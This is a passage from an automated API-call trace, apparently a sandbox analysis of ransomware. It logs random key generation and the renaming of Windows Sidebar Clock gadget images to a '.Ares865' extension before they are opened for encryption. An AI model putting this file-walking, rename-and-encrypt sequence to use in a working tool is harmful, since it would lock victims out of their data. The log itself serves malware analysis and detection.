hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.081] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.082] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_left.png.Ares865") returned 106 [0119.082] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_left.png.ares865"), dwFlags=0x1) returned 1 [0119.083] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.083] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=168) returned 1 [0119.083] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.084] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.084] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.087] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.087] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.087] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_right.png.Ares865") returned 107 [0119.088] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_right.png.ares865"), dwFlags=0x1) returned 1 [0119.089] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.089] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=165) returned 1 [0119.090] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.090] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.090] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.093] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.093] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.093] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.094] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_left.png.Ares865") returned 103 [0119.094] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_left.png.ares865"), dwFlags=0x1) returned 1 [0119.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.095] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=166) returned 1 [0119.095] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.096] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.096] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.098] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.099] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.099] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.099] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_right.png.Ares865") returned 104 [0119.099] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_right.png.ares865"), dwFlags=0x1) returned 1 [0119.101] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.101] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=168) returned 1 [0119.101] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.102] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.102] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.105] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.105] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.105] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.106] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider.png.Ares865") returned 95 [0119.106] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider.png.ares865"), dwFlags=0x1) returned 1 [0119.107] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.107] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=131) returned 1 [0119.107] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.108] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.108] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.111] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.111] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.111] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.112] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_left.png.Ares865") returned 100 [0119.112] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_left.png.ares865"), dwFlags=0x1) returned 1 [0119.113] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.113] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145) returned 1 [0119.113] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.114] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.114] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.117] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.117] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.117] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.118] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_right.png.Ares865") returned 101 [0119.118] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_right.png.ares865"), dwFlags=0x1) returned 1 [0119.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.119] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=139) returned 1 [0119.120] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.120] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.120] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.123] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.124] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.124] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.124] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_disabled.png.Ares865") returned 101 [0119.124] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_disabled.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_disabled.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_disabled.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_disabled.png.ares865"), dwFlags=0x1) returned 1 [0119.125] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_disabled.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_disabled.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.126] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=697) returned 1 [0119.126] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.126] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.127] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.129] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.129] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.129] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.130] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_hover.png.Ares865") returned 98 [0119.130] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_hover.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_hover.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_hover.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_hover.png.ares865"), dwFlags=0x1) returned 1 [0119.131] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_hover.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_hover.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.131] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1050) returned 1 [0119.132] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.132] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.132] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.134] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.135] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.135] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.136] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.Ares865") returned 100 [0119.136] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png.ares865"), dwFlags=0x1) returned 1 [0119.137] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.137] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1124) returned 1 [0119.137] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.138] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.138] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.141] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.141] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.141] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.142] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.Ares865") returned 97 [0119.142] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png.ares865"), dwFlags=0x1) returned 1 [0119.143] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.143] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=855) returned 1 [0119.143] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.144] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.144] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.146] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.147] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.147] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.147] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.Ares865") returned 102 [0119.148] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_disabled.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_disabled.png.ares865"), dwFlags=0x1) returned 1 [0119.149] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_disabled.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.149] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=697) returned 1 [0119.149] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.150] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.150] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.152] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.153] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.153] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.153] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.Ares865") returned 99 [0119.154] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_hover.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_hover.png.ares865"), dwFlags=0x1) returned 1 [0119.155] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_hover.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.155] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1047) returned 1 [0119.155] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.156] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.156] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.158] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.159] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.159] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.159] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.Ares865") returned 101 [0119.159] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_pressed.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.Ares865" (normalized: "c:\\program files (x86)\\windows 